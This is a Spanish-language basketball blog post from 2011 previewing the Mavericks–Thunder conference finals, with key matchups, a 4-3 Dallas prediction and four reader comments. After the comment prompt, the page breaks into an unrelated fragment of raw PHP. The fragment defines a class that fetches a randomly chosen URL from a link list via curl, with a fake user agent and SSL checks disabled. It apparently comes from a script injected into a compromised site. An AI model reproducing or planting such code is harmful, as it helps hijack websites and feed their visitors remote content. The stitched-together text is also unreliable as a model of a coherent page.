Análisis Dallas Maverics vs Oklahoma City Thunder

18 de May de 2011 por TheDeerHunter

Regular: 2-1 Mavericks

Mavs: 100.2 PF 96 PC
Thunder: 104.8 PF 101 PC

Problemas logísticos de diversa índole no nos permitieron preparar la previa de esta serie puntualmente. Esperamos que nos lo sepáis perdonar a pesar de que nuestro análisis queda inevitablemente intoxicado por el partidazo inaugural de la eliminatoria.

A diferencia de la conferencia opuesta, Dallas y Oklahoma alcanzan la final del oeste en contra de los pronósticos tras haber sido eliminados el curso pasado en primera ronda. Los favoritos eran Lakers y Spurs y como mucho algún atrevido había visto el fichaje de Perkins como decisivo para convertir a los Thunder en candidatos, más con la boca pequeña que otra cosa. Aquí están ambos con total merecimiento, desplegando un nivel de juego desbocado y espectacular que poco tiene que ver con el ritmo típico de playoffs. Eso sin desmerecer la defensa. Se trata de un duelo increíble, más bonito si cabe porque rompe con esa monotonía que habían instaurado los amarillos, además de ofensivo e igualado a más no poder.

Puede parecer ventajista afirmarlo ahora pero desde distintos enfoques ambos llegan a este punto con los requisitos necesarios para convertirse en campeones. Una mezcla de dureza y talento personificadas en las dos máximas estrellas en un excelente momento en sus carreras. El ‘Dirk Nowitzki vs Kevin Durant’ representará de forma definitiva ese cambio de ciclo que se ha venido anunciando desde la eliminación de los ex-campeones. Sólo nos queda disfrutarlo.

Claves de la eliminatoria

– Individualidad vs colectivo: Se ha demostrado en segunda ronda que ni los Mavericks andan mancos de individualidad, ni los Thunder son únicamente un par de tíos. Eso no quita que en líneas generales sean enfoques que los caracterizan de una forma razonablemente aproximada. Los Thunder no pueden desplegar de ninguna manera una rotación solvente de 10 tíos y tras Nowitzki no hay un escudero en Dallas tan desequilibrante como Russell Westbrook. Por cierto, Caron Butler no será de la partida en esta serie.

– Juventud vs experiencia: Los Thunder han mostrado madurez, además de descaro. No obstante ya sabemos que la dificultad y la exigencia crece conforme pasan las rondas y quitando alguna excepción no hay muchos jugadores que se hayan visto en una de estas. A los Mavericks, sin embargo, no vas a explicarles a estas alturas de la vida de qué va esto.

– Presión vs hambre: Venimos señalando la última oportunidad de Nowitkzi casi desde el “Believeazo” pero los Thunder no parecen demasiado predispuestos a dejar corregir injusticias históricas. Todo es muy relativo, la presión puede ser motivadora o acongojante y el hambre puede mutarse en conformismo por el objetivo ya cumplido.

– Pase y tiro vs contragolpe: Siendo ambos dos modelos eminentemente ofensivos veremos qué prevalece. Si la elaboración o el juego directo.

Pronóstico: 4-3 Mavericks

Comenta

4 comentarios a esta entrada

  1. Tobal dice:
    #1

    Creo que los Mavericks,son favoritos,aunque los Thunder son un conjunto a respetar,pero la experiencia y mayor profundidad de banquillo,hacen que Dallas sea favorito.

      Citar

  2. GreenPride dice:
    #2

    Para mí una eliminatoria donde prevalecerán los ataques sobre las defensas y en la que el que pueda ajustar mejor su defensa a las virtudes del otro se puede llevar el gato al agua.
    No veo defensor en Oklahoma para Nowitzki ni para Westbrook en Dallas así que estos dos podrían decidir la eliminatoria según su acierto sin dejar atrás a Durantula por supuesto.
    El banquillo en teoría es claramente favorable a los Mavs así como su experiencia aunque en este caso negativa hasta ahora. Ya veremos si los Thunder pueden afrontar unas finales de conferencia nuevas para todos sus jugadores importantes excepto Perkins.
    El tiro de Dallas será importantísimo en la serie ya que es su principal arma y la que hace tener espacios a los pocos penetradores que tiene (Barea, Marion). Si Terry-Stojakovic-Dirk pueden tirar y meten será muy difícil pararles.
    Eliminatoria bastante igualada pero yo apuesto a que Robin Hood llevará a los suyos a las finales por segunda vez. 4-2 Mavericks

      Citar

  3. edgar de la garza dice:
    #3

    Es cierto que tienen experiencia los mavericks pero oklahoma tiene coraje de triunfo jugadores jovenes
    rapidos que dificlmente los vayan a parar. solo los mavericks cuentan con un solo hombre que es la carga del equipo nowitzki los demas jugadores son impredecibles aveces juegan y por ultimo la banca de thunder va a lucir en esta final esta muy motivada y tienen hambre de campeon oklahoma en seis partidos
    lo siento nowitzki y kid se van a quedar como malone y stockton

      Citar

  4. raul dice:
    #4

    OKLAHOMA PASA POR ENCIMA DE DALLAS 4-2

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>